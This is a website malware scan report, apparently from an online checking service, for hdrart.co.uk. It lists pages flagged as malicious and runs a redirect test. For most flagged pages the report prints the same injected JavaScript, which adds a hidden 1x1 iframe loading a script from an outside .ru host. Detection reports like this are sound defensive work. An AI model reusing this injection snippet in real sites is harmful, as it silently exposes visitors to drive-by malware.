Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hdrart.co.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hdrart.co.uk/ | 200 OK Content-Length: 27439 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var z = document.createElement('iframe'); z.src = 'http://towmidar.ru/count21.php'; z.style.position = 'absolute'; z.style.border = '0'; z.style.height = '1px'; z.style.width = '1px'; z.style.left = '1px'; z.style.top = '1px'; if (!document.getElementById('z')) { document.write('<div id=\'z\'></div>'); document.getElementById('z').appendChild(z); }})(); Antivirus reports:
| ||
http://hdrart.co.uk/bullrush.htm | 200 OK Content-Length: 5946 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var z = document.createElement('iframe'); z.src = 'http://towmidar.ru/count21.php'; z.style.position = 'absolute'; z.style.border = '0'; z.style.height = '1px'; z.style.width = '1px'; z.style.left = '1px'; z.style.top = '1px'; if (!document.getElementById('z')) { document.write('<div id=\'z\'></div>'); document.getElementById('z').appendChild(z); }})(); Antivirus reports:
| ||
http://hdrart.co.uk/index.htm | 200 OK Content-Length: 27439 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var z = document.createElement('iframe'); z.src = 'http://towmidar.ru/count21.php'; z.style.position = 'absolute'; z.style.border = '0'; z.style.height = '1px'; z.style.width = '1px'; z.style.left = '1px'; z.style.top = '1px'; if (!document.getElementById('z')) { document.write('<div id=\'z\'></div>'); document.getElementById('z').appendChild(z); }})(); Antivirus reports:
| ||
http://hdrart.co.uk/laid_up.htm | 200 OK Content-Length: 5953 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var z = document.createElement('iframe'); z.src = 'http://towmidar.ru/count21.php'; z.style.position = 'absolute'; z.style.border = '0'; z.style.height = '1px'; z.style.width = '1px'; z.style.left = '1px'; z.style.top = '1px'; if (!document.getElementById('z')) { document.write('<div id=\'z\'></div>'); document.getElementById('z').appendChild(z); }})(); Antivirus reports:
| ||
http://hdrart.co.uk/test404page.js | 404 Not Found Content-Length: 406 Content-Type: text/html | clean |
http://hdrart.co.uk/princesshay.htm | 200 OK Content-Length: 5644 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var z = document.createElement('iframe'); z.src = 'http://towmidar.ru/count21.php'; z.style.position = 'absolute'; z.style.border = '0'; z.style.height = '1px'; z.style.width = '1px'; z.style.left = '1px'; z.style.top = '1px'; if (!document.getElementById('z')) { document.write('<div id=\'z\'></div>'); document.getElementById('z').appendChild(z); }})(); Antivirus reports:
| ||
http://hdrart.co.uk/tucked_away.htm | 200 OK Content-Length: 6054 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var z = document.createElement('iframe'); z.src = 'http://towmidar.ru/count21.php'; z.style.position = 'absolute'; z.style.border = '0'; z.style.height = '1px'; z.style.width = '1px'; z.style.left = '1px'; z.style.top = '1px'; if (!document.getElementById('z')) { document.write('<div id=\'z\'></div>'); document.getElementById('z').appendChild(z); }})(); Antivirus reports:
| ||
http://hdrart.co.uk/the_17th.htm | 200 OK Content-Length: 5972 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var z = document.createElement('iframe'); z.src = 'http://towmidar.ru/count21.php'; z.style.position = 'absolute'; z.style.border = '0'; z.style.height = '1px'; z.style.width = '1px'; z.style.left = '1px'; z.style.top = '1px'; if (!document.getElementById('z')) { document.write('<div id=\'z\'></div>'); document.getElementById('z').appendChild(z); }})(); Antivirus reports:
| ||
http://hdrart.co.uk/retired.htm | 200 OK Content-Length: 5987 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var z = document.createElement('iframe'); z.src = 'http://towmidar.ru/count21.php'; z.style.position = 'absolute'; z.style.border = '0'; z.style.height = '1px'; z.style.width = '1px'; z.style.left = '1px'; z.style.top = '1px'; if (!document.getElementById('z')) { document.write('<div id=\'z\'></div>'); document.getElementById('z').appendChild(z); }})(); Antivirus reports:
| ||
http://hdrart.co.uk/tranquil.htm | 200 OK Content-Length: 6118 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var z = document.createElement('iframe'); z.src = 'http://towmidar.ru/count21.php'; z.style.position = 'absolute'; z.style.border = '0'; z.style.height = '1px'; z.style.width = '1px'; z.style.left = '1px'; z.style.top = '1px'; if (!document.getElementById('z')) { document.write('<div id=\'z\'></div>'); document.getElementById('z').appendChild(z); }})(); Antivirus reports:
| ||
http://hdrart.co.uk/westward_ho.htm | 200 OK Content-Length: 5752 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var z = document.createElement('iframe'); z.src = 'http://towmidar.ru/count21.php'; z.style.position = 'absolute'; z.style.border = '0'; z.style.height = '1px'; z.style.width = '1px'; z.style.left = '1px'; z.style.top = '1px'; if (!document.getElementById('z')) { document.write('<div id=\'z\'></div>'); document.getElementById('z').appendChild(z); }})(); Antivirus reports:
| ||
http://hdrart.co.uk/fairways_view.htm | 200 OK Content-Length: 5989 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var z = document.createElement('iframe'); z.src = 'http://towmidar.ru/count21.php'; z.style.position = 'absolute'; z.style.border = '0'; z.style.height = '1px'; z.style.width = '1px'; z.style.left = '1px'; z.style.top = '1px'; if (!document.getElementById('z')) { document.write('<div id=\'z\'></div>'); document.getElementById('z').appendChild(z); }})(); Antivirus reports:
| ||
http://hdrart.co.uk/simple_scene.htm | 200 OK Content-Length: 6078 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var z = document.createElement('iframe'); z.src = 'http://towmidar.ru/count21.php'; z.style.position = 'absolute'; z.style.border = '0'; z.style.height = '1px'; z.style.width = '1px'; z.style.left = '1px'; z.style.top = '1px'; if (!document.getElementById('z')) { document.write('<div id=\'z\'></div>'); document.getElementById('z').appendChild(z); }})(); Antivirus reports:
| ||
http://hdrart.co.uk/shadows.htm | 200 OK Content-Length: 6139 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var z = document.createElement('iframe'); z.src = 'http://towmidar.ru/count21.php'; z.style.position = 'absolute'; z.style.border = '0'; z.style.height = '1px'; z.style.width = '1px'; z.style.left = '1px'; z.style.top = '1px'; if (!document.getElementById('z')) { document.write('<div id=\'z\'></div>'); document.getElementById('z').appendChild(z); }})(); Antivirus reports:
| ||
http://hdrart.co.uk/ripples.htm | 200 OK Content-Length: 5942 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var z = document.createElement('iframe'); z.src = 'http://towmidar.ru/count21.php'; z.style.position = 'absolute'; z.style.border = '0'; z.style.height = '1px'; z.style.width = '1px'; z.style.left = '1px'; z.style.top = '1px'; if (!document.getElementById('z')) { document.write('<div id=\'z\'></div>'); document.getElementById('z').appendChild(z); }})(); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hdrart.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Oct 2014 09:07:07 GMT
Accept-Ranges: bytes
ETag: "6b2f-4d0a817e64646"
Server: Apache
Vary: Accept-Encoding
Content-Length: 27439
Content-Type: text/html
Last-Modified: Wed, 12 Dec 2012 13:51:20 GMT
...27439 bytes of data.
GET / HTTP/1.1
Host: hdrart.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Oct 2014 09:07:07 GMT
Accept-Ranges: bytes
ETag: "6b2f-4d0a817e64646"
Server: Apache
Vary: Accept-Encoding
Content-Length: 27439
Content-Type: text/html
Last-Modified: Wed, 12 Dec 2012 13:51:20 GMT
...27439 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hdrart.co.uk
Referer: http://www.google.com/search?q=hdrart.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hdrart.co.uk
Referer: http://www.google.com/search?q=hdrart.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.